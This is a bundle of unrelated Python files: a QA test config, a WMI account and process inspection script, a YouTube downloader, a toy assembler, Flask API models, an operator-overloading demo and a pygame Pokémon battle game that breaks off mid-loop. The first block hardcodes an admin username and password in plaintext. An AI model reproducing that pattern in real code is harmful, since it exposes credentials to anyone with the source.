application_url = "https://qa1cmd.tangoe.com/manage/login/login.trq"

# BUG FIX: Windows paths must be raw strings. In a normal string literal
# "\U" starts a \UXXXXXXXX unicode escape, which makes these lines a
# SyntaxError on Python 3; raw strings keep every backslash literal.
input_path = r'C:\Users\sandeeps\PycharmProjects\CodeFestS\com\Testdata.csv'
output_path = r"C:\Users\sandeeps\PycharmProjects\CodeFestS\com\codefest\scripts\problems\problem1\TestResult"

# Admin credentials used by the test scripts.
usernameadmin = '3siadmin'
passwordadmin = 'ppppp11'

report_category = "Department Summary Reports"
report_category_csv = r"C:\Users\sandeeps\PycharmProjects\Tangoe\com\Reports\GenerateReports\Testdata\DepartmentSummaryReports.csv"
ParameterFormat1_csv = r"C:\Users\sandeeps\PycharmProjects\Tangoe\com\Reports\GenerateReports\Testdata\ParameterFormat1.csv"
|
import wmi
def show_wmi_classes(w):
    """Print every WMI class whose name mentions 'User' or 'Account'."""
    interesting = (name for name in w.classes
                   if 'User' in name or 'Account' in name)
    for name in interesting:
        print("Class: " + str(name))
def show_wmi_methods(item):
    """Print *item* itself, then the name of each of its WMI methods."""
    print(item)
    for method_name in item.methods.keys():
        print("Method: " + str(method_name))
def show_wmi_properties(item):
    """Print each WMI property name alongside its current value."""
    for prop in item.properties.keys():
        value = getattr(item, prop)
        print("Prop: " + prop + " -> " + str(value))
def show_wmi_processes(w, process_name):
    """Print the caption of every running process named *process_name*."""
    for proc in w.Win32_Process(name=process_name):
        print("LMS Process: " + str(proc.Caption))
def kill_wmi_process(w, process_name):
    """Terminate every running process whose name matches *process_name*."""
    for proc in w.Win32_Process(name=process_name):
        print("Killing Process: " + str(proc.Name))
        proc.Terminate()
def show_wmi_net_interfaces(w):
    """Print description, MAC, and every IP of each IP-enabled adapter."""
    for adapter in w.Win32_NetworkAdapterConfiguration(IPEnabled=1):
        print("Int: " + str(adapter.Description) + " " + str(adapter.MACAddress))
        for addr in adapter.IPAddress:
            print("IP Addr: " + str(addr))
def show_wmi_removable_drives(w):
    """Print caption and human-readable drive type for every logical disk."""
    # Win32_LogicalDisk.DriveType codes -> readable names.
    DRIVE_TYPES = {
        0: "Unknown",
        1: "No Root Directory",
        2: "Removable Disk",
        3: "Local Disk",
        4: "Network Drive",
        5: "Compact Disk",
        6: "RAM Disk",
    }
    for drive in w.Win32_LogicalDisk():
        # if drive.DriveType != 3:
        # NOTE - Picking up some USB drives as local?
        label = DRIVE_TYPES[drive.DriveType]
        print("Found Drive: " + drive.Caption + " (" + label + ")")
        print(drive)
# Connect to the local WMI service and inspect the Win32_Account class.
w = wmi.WMI()
# show_wmi_classes(w)
# Win32_LoggedOnUser
# Win32_AccountSID
# Win32_Account
# Win32_UserProfile
# Win32_UserDesktop
# Win32_UserAccount
# NOTE(review): Win32_Account is not called here, so `item` is the query
# wrapper/class itself rather than a result instance -- confirm intended.
item = w.Win32_Account
show_wmi_methods(item)
show_wmi_properties(item)
#show_wmi_processes(w, "OPE_LMS.exe")
#kill_wmi_process(w, "OPE_LMS.exe")
#show_wmi_net_interfaces(w)
#show_wmi_removable_drives(w)
|
#!/usr/bin/env python3
import argparse
import os
import json
import threading
from queue import Queue
from subprocess import check_output
from youtube import Channel
from youtube.offliberty import Offurl, Offget
def getVid(url, path, vid = False, name = '', thumb = False, quiet = False):
    """Fetch one video (or just its audio when vid is False) via offliberty
    and save it under *path*; optionally also download the thumbnail."""
    grabber = Offget(url, vid = vid)
    if name:
        grabber.name = name
    grabber.getUrl(quiet = quiet)
    grabber.dl(path = path, quiet = quiet)
    if thumb:
        grabber.ytVid.setInfo()
        grabber.ytVid.thumb.dl(path = path, quiet = quiet)
def getVidThreader(q, **kwargs):
    """Queue-aware wrapper around getVid: claim a slot, download, mark done."""
    q.get()  # claim the work slot; the queued value itself is unused
    getVid(**kwargs)
    q.task_done()
def getVidAsync(q, **kwargs):
    """Start getVid on a background thread and register it on the queue."""
    worker = threading.Thread(target=getVidThreader, args=[q], kwargs=kwargs)
    worker.start()
    q.put(q.qsize())
def getClipboard():
    """Return the current X selection as text (requires the 'xsel' command)."""
    raw = check_output(['xsel'])
    return raw.decode('utf-8')
def autoDownload(**kwargs):
    """Poll the clipboard forever; download any new YouTube url that appears.

    Non-YouTube text is reported once per distinct clipboard value.
    """
    import time  # local import: only needed for the polling delay

    q = Queue()
    kwargs['url'] = ''
    while True:
        text = getClipboard()
        if text != kwargs['url']:
            kwargs['url'] = text
            if any(link in text for link in ('youtube.com', 'youtu.be')):
                getVidAsync(q, **kwargs)
            else:
                # BUG FIX: a once-only flag used to suppress this message
                # forever after the first invalid url; report each new one.
                print(text, 'is not a valid url')
        # BUG FIX: sleep between polls -- the old loop busy-waited at 100% CPU.
        time.sleep(0.5)
if __name__ == '__main__':
    # CLI: download one url, a whole channel (-C), resolve the offliberty
    # url only (-u), or watch the clipboard continuously (--auto).
    parser=argparse.ArgumentParser()
    parser.add_argument('url', metavar = 'url', nargs='?', help = 'Video url')
    parser.add_argument('-v', action = 'store_true', help = 'Download the video instead of audio')
    parser.add_argument('-t', action = 'store_true', help = 'Download thumbnail')
    parser.add_argument('-u', action = 'store_true', help = 'Get the offliberty url only')
    parser.add_argument('-o', default = '', help = 'Specify output file')
    parser.add_argument('--auto', action = 'store_true', help = 'Auto download any urls in clipboard')
    parser.add_argument('-C', action = 'store_true', help = 'Download all videos from channel')
    parser.add_argument('-s', action = 'store_true', help = 'Quiet mode. Will still output url if requested')
    args=parser.parse_args()
    path=os.getcwd()
    if args.auto:
        autoDownload(path = path, vid = args.v, name =args.o, thumb = args.t, quiet = args.s)
    else:
        if args.u:
            # Resolve and print the direct download url without downloading.
            o = Offurl(args.url, vid = args.v)
            o.req(quiet = args.s)
            print(o.text)
            if args.t:
                o.ytVid.thumb.testUrl()
                print(o.ytVid.thumb.url)
        elif args.C:
            # Download every video of the given channel.
            channel = Channel(args.url)
            channel.req()
            for vid in channel.iter_vids():
                getVid(vid.url, path = path, vid = args.v, name = args.o, thumb = args.t, quiet = args.s)
        else:
            getVid(url = args.url, path = path, vid = args.v, name = args.o, thumb = args.t, quiet = args.s)
import sys
def is_def(s):
    """Return True if *s* is a label definition (leading '@').

    BUG FIX: startswith avoids an IndexError on the empty string,
    which s[0] raised.
    """
    return s.startswith('@')
def is_ref(s):
    """Return True if *s* is a label reference (leading '!').

    BUG FIX: startswith avoids an IndexError on the empty string.
    """
    return s.startswith('!')
def is_bin(s):
    """Return True if *s* looks like a binary literal such as '0b101'
    (i.e. its second character is 'b')."""
    return len(s) >= 2 and s[1] == 'b'
def is_byte(x):
    """Return True if *x* parses as an integer (binary '0b...' or decimal)."""
    try:
        if is_bin(x):
            int(x, 2)
        else:
            int(x)
        return True
    except (ValueError, TypeError):
        # BUG FIX: the bare `except` also swallowed KeyboardInterrupt and
        # SystemExit; only parse failures mean "not a byte".
        return False
def to_int(x):
    """Parse *x* as an int, honouring the '0b' binary form."""
    base = 2 if is_bin(x) else 10
    return int(x, base)
def get_op(s, symbols):
    """Translate one assembly token into its byte value.

    Label definitions assemble to NOP (4); label references resolve via
    *symbols*; numeric literals pass through; otherwise the token is
    looked up in the mnemonic table (KeyError on unknown mnemonics).
    """
    if is_def(s):
        return 4
    if is_ref(s):
        return symbols[s[1:]]
    if is_byte(s):
        return to_int(s)
    mnemonics = {
        "HALT": 0, "LOADI": 1, "ADD": 2, "PRINT": 3, "NOP": 4,
        "JUMP": 5, "LOADR": 6, "JEQ": 7, "COMP": 8, "JNEQ": 9,
        "COLOR": 10, "INC": 11, "DEC": 12, "CALL": 13, "RET": 14,
        "INPUT": 15, "AND": 16, "XOR": 17, "OR": 18, "SUB": 19,
        "DIV": 20, "MUL": 21, "JZ": 22, "JNZ": 23, "PRINTB": 24,
        "ANDI": 25, "COLORI": 26, "DRAW": 27, "PUSH": 28, "POP": 29,
        "JUMPDT": 30,
    }
    return mnemonics[s]
def compile(infile):
    """Assemble *infile* into a bytearray of opcode bytes.

    First pass records '@label' addresses; second pass emits one byte per
    token. NOTE: intentionally shadows the builtin compile() -- name kept
    for compatibility with existing callers.
    """
    # BUG FIX: close the source file deterministically (it was left open).
    with open(infile) as src:
        tokens = src.read().split()
    symbols = dict()
    program = bytearray()
    # First pass: find all the label defs.
    for addr, op in enumerate(tokens):
        print(addr, op)
        if is_def(op):
            symbols[op[1:]] = addr
    # Second pass: emit one byte per token.
    for op in tokens:
        program.append(get_op(op, symbols))
    # BUG FIX: guard the debug print -- a program without a 'main' label
    # previously crashed here with KeyError.
    if "main" in symbols:
        print("main: ", symbols["main"])
    print(symbols)
    return program
if __name__ == "__main__":
    # Usage: assembler.py <source-file> <output-binary>
    infile = sys.argv[1]
    outfile = sys.argv[2]
    p = compile(infile)
    with open(outfile, "wb") as f:
        f.write(p)
|
from flask_restplus import fields
from api import api
# Request payload schema for creating an address-book entry.
add_address = api.model("add_address", {
    "name" : fields.String(),
    "address" : fields.String(),
    "city" : fields.String(),
    "state" : fields.String(),
    "country" : fields.String(),
    "pincode" : fields.String(),
    "phone_numbers" : fields.List(fields.String()),
    "email_address" : fields.String(),
})
# Request payload schema for updating an entry.
# NOTE(review): field-for-field identical to add_address; consider deriving
# one from the other (e.g. api.clone) to avoid drift.
updated_address = api.model("update_address", {
    "name" : fields.String(),
    "address" : fields.String(),
    "city" : fields.String(),
    "state" : fields.String(),
    "country" : fields.String(),
    "pincode" : fields.String(),
    "phone_numbers" : fields.List(fields.String()),
    "email_address" : fields.String(),
})
|
'''
Created on Apr 30, 2009
@author: pmackenz
'''
class MyClass(object):
    """Toy class demonstrating Python operator overloading (dunder methods).

    Each method announces itself on stdout before doing its work, so the
    demo in main() shows which hooks fire for which expressions.
    """

    def __init__(self, v, s):
        print("entering __init__({})".format(v))
        self.val = v
        self.my_name = str(s)

    def __len__(self):
        # Only meaningful when self.val has a length itself.
        print("entering __len__()")
        return len(self.val)

    def __add__(self, other):
        # x + y builds a new instance whose name records the operation.
        print("entering __add__({})".format(other.val))
        combined_name = "%s+%s" % (self.my_name, other.name())
        return MyClass(self.val + other.val, combined_name)

    def __sub__(self, other):
        print("entering __sub__({})".format(other.val))
        combined_name = "%s-%s" % (self.my_name, other.name())
        return MyClass(self.val - other.val, combined_name)

    def name(self):
        print("entering __name__()")
        return self.my_name

    def setname(self, s):
        print("entering __setname__({})".format(s))
        self.my_name = s

    def __str__(self):
        print("entering __str__()")
        return str(self.val)
def main():
    """Exercise MyClass's overloaded operators and print each result."""
    x = MyClass( 4, 'peter')
    print("variable x = {} (type: {}, name: {})".format(x, type(x), x.name()))
    y = MyClass( 7, 'joe' )
    print("variable y = {} (type: {}, name: {})".format(y, type(y), y.name()))
    # x + y and y + x both dispatch to __add__ on the left operand.
    z = x + y
    print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
    z = y + x
    print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
    z.setname('paul')
    print("variable z = {} (type: {}, name: {})".format(z, type(z), z.name()))
    a = x - y
    print("variable a = {} (type: {}, name: {})".format(a, type(a), a.name()))
    b = z + x
    print("variable b = {} (type: {}, name: {})".format(b, type(b), b.name()))
# main execution (note: runs on import too -- there is no __main__ guard)
main()
|
"""
"""
import sys, os, pygame, time, random
import battle, get_pokemon_info
from PIL import Image
def load_resources(screen = None, my_pk = None, opp_pk = None):
    """my_pk and opp_pk must be the national dex numbers
    of the pokemon"""
    # State machine functions
    res["show moves logic"] = show_moves_logic
    res["show moves display"] = show_moves_display
    res["first attack logic"] = attack_logic
    res["first attack display"] = attack_display
    res["second attack logic"] = attack_logic
    res["second attack display"] = attack_display
    res["game over logic"] = game_over_logic
    res["game over display"] = game_over_display
    # Shared font and palette constants.
    res["font"] = pygame.font.Font("Resources\\Pokemon Fonts\\pkmnrs.ttf", 30)
    res["black"] = (0, 0, 0)
    res["red"] = (255, 0, 0)
    res["green"] = (0, 255, 0)
    res["yellow"] = (255, 255, 0)
    res["blue"] = (0, 0, 255)
    res["text colour"] = res["black"]
    res["anti alias"] = True
    res["size"] = 720, 480
    os.environ["SDL_VIDEO_CENTERED"] = "1" # Centres game window
    if screen:
        res["screen"] = screen
    else:
        res["screen"] = pygame.display.set_mode(res["size"])
    # Pick two random pokemon, then override with explicit choices if given.
    number_of_pokemon = 2
    pokemon_numbers = get_random_pokemon(number_of_pokemon)
    if my_pk:
        my_pk = get_pokemon_info.pokemon_number(my_pk)
        pokemon_numbers[0] = my_pk
    if opp_pk:
        opp_pk = get_pokemon_info.pokemon_number(opp_pk)
        pokemon_numbers[1] = opp_pk
    pokemon_names = get_pokemon_names(pokemon_numbers)
    pokemon_1 = pokemon_numbers[0]
    pokemon_2 = pokemon_numbers[1]
    res["my moves"] = get_moves(pokemon_names[0])
    res["opp moves"] = get_moves(pokemon_names[1])
    res["all moves"] = get_pokemon_info.get_dict("all_moves.txt")
    res["physical moves"] = get_pokemon_info.get_dict("physical_moves.txt")
    res["special moves"] = get_pokemon_info.get_dict("special_moves.txt")
    res["other moves"] = get_pokemon_info.get_dict("other_moves.txt")
    res["pokemon"] = create_pokemon(pokemon_numbers, [res["my moves"], res["opp moves"]])
    p0 = res["pokemon"][0]
    p1 = res["pokemon"][1]
    # Original size: 96 x 96, scaled size = 288, 288
    f2 = pygame.image.load("Resources\\bw-001n\\" + pokemon_2 + ".png")
    pokemon_position = get_opponent_position(pokemon_2)
    res["positions"] = [(60, 150), pokemon_position]
    f2 = pygame.transform.scale(f2, (192, 192))
    f1 = pygame.image.load("Resources\\bwback-001n\\" + pokemon_1 + ".png")
    f1 = pygame.transform.scale(f1, (288, 288))
    res["opp pokemon sprite"] = f2
    res["my pokemon sprite"] = f1
    res["bg"] = pygame.image.load("Resources\\battle_screen_with_moves_blank.png")
    res["type icons"] = load_pokemon_type_icons()
    res["moves bar"] = pygame.image.load("Resources\\moves_bar.png")
    res["move selection"] = pygame.image.load("Resources\\move_selection.png")
    res["text bar"] = pygame.image.load("Resources\\text_bar.png")
    res["my hp bar"] = pygame.image.load("Resources\\hp_bar_01.png")
    res["opp hp bar"] = pygame.image.load("Resources\\hp_bar_02.png")
    # Separate colour-fill surfaces per side so they can be scaled independently.
    res["my green hp"] = pygame.image.load("Resources\\hp_bars\\green.png")
    res["opp green hp"] = pygame.image.load("Resources\\hp_bars\\green.png")
    res["my yellow hp"] = pygame.image.load("Resources\\hp_bars\\yellow.png")
    res["opp yellow hp"] = pygame.image.load("Resources\\hp_bars\\yellow.png")
    res["my red hp"] = pygame.image.load("Resources\\hp_bars\\red.png")
    res["opp red hp"] = pygame.image.load("Resources\\hp_bars\\red.png")
    res["my empty hp"] = pygame.image.load("Resources\\hp_bars\\empty.png")
    res["opp empty hp"] = pygame.image.load("Resources\\hp_bars\\empty.png")
    res["hp bars pos"] = [(380, 225), (30, 43)]
    res["hp colour pos"] = [(res["hp bars pos"][1][0] + 95, res["hp bars pos"][1][0] + 61)]
    res["hp colour pos"] += [(res["hp bars pos"][1][0] + 459, res["hp bars pos"][1][0] + 242)]
    res["hp max colour width"] = 144
    res["hp widths"] = [144, 144]
    res["hp percent"] = [p0.stats["HP"] / p0.original_stats["HP"]]
    res["hp percent"] += [p1.stats["HP"] / p1.original_stats["HP"]]
    res["my hp bar status"] = {"colour" : "green", "width" : 144 * res["hp percent"][0]}
    res["opp hp bar status"] = {"colour" : "green", "width" : 144 * res["hp percent"][1]}
    res["hp bars"] = [{
        "green" : res["my green hp"], "yellow" : res["my yellow hp"],
        "red" : res["my red hp"], "empty" : res["my empty hp"]
    }]
    res["hp bars"] += [{
        "green" : res["opp green hp"], "yellow" : res["opp yellow hp"],
        "red" : res["opp red hp"], "empty" : res["opp empty hp"]
    }]
    res["prev hp"] = [p1.original_stats["HP"], p0.original_stats["HP"]]
    res["move surfaces"] = []
    for move in res["my moves"]:
        res["move surfaces"] += [get_move_surface(move, res["anti alias"], res["text colour"])]
    res["quadrants"] = initialise_display()
    res["move selection pos"] = []
    for quadrant in res["quadrants"]:
        res["move selection pos"] += [(quadrant[0] + 3, quadrant[1] + 3)]
    #res["battle music"] =
    # NOTE(review): the commented assignment above suggests the loaded music
    # was meant to be stored in res; playback later goes through
    # pygame.mixer.music directly, so this still works.
    load_sound("FRLG_Battle_01.mp3")
def get_random_pokemon(number_of_pokemon):
    """Return a list of n random dex numbers from 001-649
    (Bulbasaur to Genesect), formatted via get_pokemon_info."""
    return [
        get_pokemon_info.pokemon_number(random.randrange(1, 650))
        for _ in range(number_of_pokemon)
    ]
def get_pokemon_names(pokemon_numbers):
    """Map dex numbers to pokemon names via the numbered_pokemon table."""
    numbered_pokemon = get_pokemon_info.get_dict("numbered_pokemon.txt")
    return [numbered_pokemon[num] for num in pokemon_numbers]
def get_moves(pokemon_name):
    """Return a random move set for *pokemon_name*."""
    return get_pokemon_info.get_random_moves(pokemon_name)
def create_pokemon(pokemon_numbers, moves):
    """Build a battle.Pokemon for each dex number, pairing each with the
    corresponding entry in *moves*."""
    numbered_pokemon = get_pokemon_info.get_dict("numbered_pokemon.txt")
    all_stats = get_pokemon_info.get_dict("pokemon_stats.txt")
    roster = []
    for i, num in enumerate(pokemon_numbers):
        name = numbered_pokemon[get_pokemon_info.pokemon_number(num)]
        roster.append(battle.Pokemon(name, moves[i], all_stats[name]))
    return roster
def split_list(cols, linear_list):
    """Chunk *linear_list* into rows of exactly *cols* elements.

    Note: a trailing partial row (fewer than cols items) is discarded,
    matching the original behaviour.
    """
    rows = []
    row = []
    for index, element in enumerate(linear_list, start=1):
        row.append(element)
        if index % cols == 0:
            rows.append(row)
            row = []
    return rows
def get_opponent_position(opponent_number):
    # Find the bottom-most pixel in the middle column, and align
    # that with the center of the opponent stage
    image = Image.open("Resources\\bw-001n\\" + opponent_number + ".png")
    # NOTE(review): Image.ANTIALIAS was removed in Pillow 10; newer Pillow
    # needs Image.LANCZOS here.
    image = image.resize((192, 192), Image.ANTIALIAS)
    image = image.convert("RGBA")
    pixel_data = list(image.getdata())
    pixel_data = split_list(192, pixel_data)  # rows of 192 RGBA tuples
    middle = 96
    stage_middle = (520, 195)
    for i in range(96, len(pixel_data)):
        if pixel_data[i][middle][3] != 0:  # alpha > 0: opaque pixel in middle column
            bottom = i
    # NOTE(review): `bottom` is unbound (NameError) if the middle column is
    # fully transparent below row 96 -- confirm sprites guarantee a pixel.
    return (stage_middle[0] - middle, stage_middle[1] - bottom)
def load_pokemon_type_icons():
    """Load and scale one icon surface per move type / damage category."""
    move_types = ["bug", "dark", "dragon", "electric", "fighting", "fire",
                  "flying", "ghost", "grass", "ground", "ice", "normal",
                  "other", "physical", "poison", "psychic", "rock",
                  "special", "steel", "water"]
    # Damage-category icons are slightly smaller than elemental type icons.
    small_icons = {"physical", "special", "other"}
    type_icons = {}
    for type_name in move_types:
        icon = pygame.image.load("Resources\\Move Icons\\" + type_name + ".png")
        size = (56, 28) if type_name in small_icons else (64, 32)
        type_icons[type_name] = pygame.transform.scale(icon, size)
    return type_icons
def get_move_surface(move, anti_alias, text_colour):
    """Render *move*'s name to a text surface using the shared font.

    BUG FIX: honour the anti_alias argument -- it was previously ignored
    and hard-coded to True.
    """
    return res["font"].render(move, anti_alias, text_colour)
def initialise_display():
    """Return the four clickable move-selection rectangles (quadrants)."""
    moves_center = (240, 410)
    quadrant_width = moves_center[0] - 18
    quadrant_height = moves_center[1] - 356
    # Top-left corners: two columns x two rows of the moves bar.
    corners = [(18, 356), (241, 356), (18, 410), (241, 410)]
    return [pygame.Rect(x, y, quadrant_width, quadrant_height)
            for x, y in corners]
def mouse_in_quadrant(mouse_position, move_quadrants):
    """Return the index (0-3) of the quadrant under the mouse, or -1."""
    for index, quadrant in enumerate(move_quadrants[:4]):
        if quadrant.collidepoint(mouse_position):
            return index
    return -1
def update_state_machine():
    """Advance the battle state machine one step.

    Transitions (driven by mouse-up events):
      start -> show moves -> first attack -> second attack -> show moves ...
    Either attack state jumps to 'game over' when a pokemon has fainted.
    States to be worked on include healing/items, party display, switching,
    and running from battle. State functions are looked up via res, e.g.
    res["game over logic"](). Unhandled states are returned unchanged.
    """
    current = res["game state"]
    if current == "start":
        return "show moves"
    if current == "show moves":
        # Advance only when the click confirms the highlighted move.
        if res["selected index"] == res["current quadrant"]:
            return "first attack"
        return current
    if current == "first attack":
        return "game over" if res["fainted"] else "second attack"
    if current == "second attack":
        return "game over" if res["fainted"] else "show moves"
    return current
def show_moves_logic():
    """Record the clicked quadrant as the selected move, if any was hit."""
    quadrant = res["current quadrant"]
    if quadrant != -1:
        res["selected index"] = quadrant
        res["current move"] = res["my moves"][quadrant]
def show_moves_display():
    """Draw the move-selection bar: the four move names, the highlight
    box, and the highlighted move's power/type/accuracy panel."""
    move_surfaces = res["move surfaces"]
    quadrants = res["quadrants"]
    screen = res["screen"]
    moves_bar = res["moves bar"]
    move_selection = res["move selection"]
    moves = res["my moves"]
    selected_index = res["selected index"]
    anti_alias = res["anti alias"]
    text_colour = res["text colour"]
    type_icons = res["type icons"]
    screen.blit(moves_bar, (0, 337))
    # One pre-rendered name surface per quadrant (offsets tuned per slot).
    screen.blit(move_surfaces[0],(quadrants[0][0] + 30, quadrants[0][1] + 15))
    screen.blit(move_surfaces[1],(quadrants[1][0] + 10, quadrants[1][1] + 15))
    screen.blit(move_surfaces[2],(quadrants[2][0] + 30, quadrants[2][1] + 10))
    screen.blit(move_surfaces[3],(quadrants[3][0] + 10, quadrants[3][1] + 10))
    # -2 is the "nothing selected yet" sentinel set in main().
    if res["selected index"] != -2:
        screen.blit(move_selection, res["move selection pos"][res["selected index"]])
    # Display move information
    highlighted_move = moves[selected_index]
    move_data = res["all moves"][highlighted_move]
    move_type = move_data[0]
    move_phys_spec = move_data[1]
    move_power = move_data[3]
    move_accuracy = move_data[4]
    move_text = ["Power: " + str(move_power)]
    #move_text += ["Type: " + move_type[0:4].upper() + "/" + move_phys_spec[0:3].upper()]
    move_text += ["Type: "]
    move_text += ["Accuracy: " + str(move_accuracy) + "%"]
    right_box = [res["font"].render(move_text[0] , anti_alias, text_colour)]
    right_box += [res["font"].render(move_text[1] , anti_alias, text_colour)]
    right_box += [res["font"].render(move_text[2] , anti_alias, text_colour)]
    screen.blit(right_box[0],(505, 360))
    screen.blit(right_box[1],(505, 395))
    screen.blit(right_box[2],(505, 430))
    # Icons for the move's element and physical/special category.
    screen.blit(type_icons[move_type],(573, 392))
    screen.blit(type_icons[move_phys_spec],(641, 394))
def get_opponent_move():
    """Pick a random move for the opponent.

    BUG FIX: randrange(3) could never select the last move of the set;
    choose uniformly from the whole move list instead.
    """
    return random.choice(res["opp moves"])
def show_attack(attacker, defender, current_move):
    """Apply *current_move* via battle.attack and build the battle text.

    Returns (battle_over, battle_text) where battle_text is a list of
    rendered text surfaces describing the attack and any faint.

    BUG FIX: the attacker-fainted branch used to return *before* the
    message list was rendered, handing back an empty battle_text that the
    display code then crashed on when indexing.
    """
    battle_over = False
    temp_HP = defender.stats["HP"]
    battle_text_message = []
    battle_text = []
    battle.attack(attacker, defender, current_move)
    if temp_HP != defender.stats["HP"]:
        battle_text_message += ["", attacker.name + " used " +
                                current_move + "!", ""]
    else:
        # Damage was zero: report the move as ineffective.
        battle_text_message = [""]
        battle_text_message += [attacker.name + " used " + current_move]
        battle_text_message[1] += "... but it had no effect!"
        battle_text_message += [""]
    if attacker.stats["HP"] == 0:
        battle_text_message += [attacker.name + " fainted... " + defender.name + " wins!"]
        battle_over = True
    elif defender.stats["HP"] == 0:
        battle_text_message += [defender.name + " fainted... " + attacker.name + " wins!"]
        battle_over = True
    # Render every message line (including the faint line, if any).
    for line in battle_text_message:
        battle_text += [res["font"].render(line, True, (0, 0, 0))]
    return battle_over, battle_text
def attack_logic():
    """Resolve one attack for whichever side the current state indicates."""
    state = res["game state"]
    if state == "first attack":
        attacker, defender = res["pokemon"][0], res["pokemon"][1]
    elif state == "second attack":
        # Opponent's turn: it picks its move at random.
        res["current move"] = get_opponent_move()
        attacker, defender = res["pokemon"][1], res["pokemon"][0]
    res["fainted"], res["battle text"] = show_attack(attacker, defender, res["current move"])
def attack_display():
    """Draw the text bar with the current battle message.

    Only line 1 of the rendered battle text is shown; lines 0 and 2 are
    blank spacers produced by show_attack.
    """
    screen = res["screen"]
    screen.blit(res["text bar"], (0, 337))
    screen.blit(res["battle text"][1], (25, 398))
def game_over_logic():
    # Flag the battle as finished; the main loop reads this to stop play.
    res["game over"] = True
def game_over_display():
    """Show the final 'fainted ... wins!' line and request game exit."""
    screen = res["screen"]
    screen.blit(res["text bar"], (0, 337))
    # Index 3 is the win/lose line appended by show_attack.
    screen.blit(res["battle text"][3], (25, 398))
    res["exit game"] = True
def update_hp_bars():
    """Redraw both HP bars (colour + width) and the HP fraction text.

    BUG FIX: the 'empty' colour was unreachable because `<= 0.2` was
    tested before `== 0`; the zero check now comes first.
    """
    screen = res["screen"]
    p0 = res["pokemon"][0]
    p1 = res["pokemon"][1]
    p0_hp_bar = res["my hp bar status"]
    p1_hp_bar = res["opp hp bar status"]
    myfont = res["font"]
    hp_bars = res["hp bars"]
    hp_colour_pos = res["hp colour pos"]
    prev_hp = res["prev hp"]
    pokemon = res["pokemon"]
    anti_alias = res["anti alias"]
    text_colour = res["text colour"]
    hp_percent = [p0.stats["HP"] / p0.original_stats["HP"]]
    hp_percent += [p1.stats["HP"] / p1.original_stats["HP"]]

    def _pick_colour(fraction):
        # Shared threshold logic for both bars.
        if fraction == 0:
            return "empty"
        if fraction > 0.5:
            return "green"
        if fraction > 0.2:
            return "yellow"
        return "red"

    # NOTE: bar status 0 tracks the opponent's fraction and status 1 the
    # player's, mirroring the original index swap.
    p0_hp_bar["colour"] = _pick_colour(hp_percent[1])
    p1_hp_bar["colour"] = _pick_colour(hp_percent[0])
    new_widths = [144 * hp_percent[0], 144 * hp_percent[1]]
    hp_1 = hp_bars[0][p0_hp_bar["colour"]]
    hp_2 = hp_bars[1][p1_hp_bar["colour"]]
    hp_1 = pygame.transform.scale(hp_1, (round(new_widths[1]), 6))
    hp_2 = pygame.transform.scale(hp_2, (round(new_widths[0]), 6))
    hp_bars[0][p0_hp_bar["colour"]] = hp_1
    hp_bars[1][p1_hp_bar["colour"]] = hp_2
    # Green/red/yellow/empty hp fills:
    screen.blit(hp_bars[0][p0_hp_bar["colour"]], hp_colour_pos[0])
    screen.blit(hp_bars[1][p1_hp_bar["colour"]], hp_colour_pos[1])
    # HP text shows the previous frame's values (animating catch-up).
    hp_text_message = [str(prev_hp[1]) + "/" +
                       str(pokemon[0].original_stats["HP"])]
    hp_text_message += [str(prev_hp[0]) + "/" +
                        str(pokemon[1].original_stats["HP"])]
    res["prev hp"] = [pokemon[1].stats["HP"], pokemon[0].stats["HP"]]
    hp_text = [myfont.render(hp_text_message[0], anti_alias, text_colour)]
    hp_text += [myfont.render(hp_text_message[1], anti_alias, text_colour)]
    screen.blit(hp_text[1], (hp_colour_pos[0][0] + 80, hp_colour_pos[0][1] + 15))
    screen.blit(hp_text[0], (hp_colour_pos[1][0] + 80, hp_colour_pos[1][1] + 15))
def load_sound(filename):
    """Load a music file from the sounds folder; None if mixer unavailable."""
    if not pygame.mixer:
        return None
    return pygame.mixer.music.load("Resources/Sounds/" + filename)
def update_screen():
    """Redraw the full battle scene: background, sprites, HP bars, names."""
    screen = res["screen"]
    f2 = res["opp pokemon sprite"]
    f1 = res["my pokemon sprite"]
    p0 = res["pokemon"][0]
    p1 = res["pokemon"][1]
    # Display background, pokemon, hp bars, and moves/battle text:
    screen.fill(res["black"])
    screen.blit(res["bg"], (0, 0))
    screen.blit(f1, res["positions"][0])
    screen.blit(f2, res["positions"][1])
    screen.blit(res["my hp bar"], res["hp bars pos"][0])
    screen.blit(res["opp hp bar"], res["hp bars pos"][1])
    # Display pokemon names above their respective HP bars
    p1_name_text = res["font"].render(p1.name, True, res["text colour"])
    p0_name_text = res["font"].render(p0.name, True, res["text colour"])
    name_text_pos = [(420, 236), (55, 54)]
    screen.blit(p1_name_text, name_text_pos[1])
    screen.blit(p0_name_text, name_text_pos[0])
    update_hp_bars()
def advance_frame():
    """Flip the display buffer to show the frame just drawn."""
    # update whole screen (use display.update(rectangle) to update
    # chosen rectangle portions of the screen to update
    pygame.display.flip()
def main(screen = None, my_pk = None, opp_pk = None):
    """Run the battle loop; optional dex numbers select the two pokemon.

    The outer loop supports replaying (press R at game over); the inner
    loop is the per-frame event/update/draw cycle.
    """
    # res is a dict of all resource variables
    res["keep playing"] = True
    while res["keep playing"]:
        res["keep playing"] = False
        # Initialise
        pygame.init()
        pygame.font.init()
        pygame.mixer.init()
        load_resources(screen, my_pk, opp_pk)
        p0 = res["pokemon"][0]
        p1 = res["pokemon"][1]
        #res["game state"] = "start"
        res["game state"] = "show moves"
        res["game over"] = False
        res["my turn"] = True
        res["exit game"] = False
        res["move selected"] = -1 # [-1, 0, 1] = [not selected, selected, confirmed]
        res["selected index"] = -2 # random value that isn't a possible index and not -1
        #res["battle music"].play()
        pygame.mixer.music.set_volume(0.1)
        pygame.mixer.music.play()
        while 1:
            if res["game over"]:
                # Game-over screen: R restarts, Esc or A quits.
                for event in pygame.event.get():
                    keys = pygame.key.get_pressed()
                    if keys[pygame.K_r]:
                        res["keep playing"] = True
                    elif keys[pygame.K_ESCAPE] or keys[pygame.K_a]:
                        #pygame.display.quit()
                        #sys.exit()
                        pygame.mixer.music.stop()
                        return
                if res["keep playing"]:
                    break
            for event in pygame.event.get():
                keys = pygame.key.get_pressed()
                if event.type == pygame.QUIT or keys[pygame.K_ESCAPE]:
                    pygame.mixer.music.stop()
                    pygame.display.quit()
                    sys.exit()
                elif event.type == pygame.MOUSEBUTTONUP:
                    # A mouse-up drives the state machine, then runs the
                    # new state's logic handler via the res dispatch table.
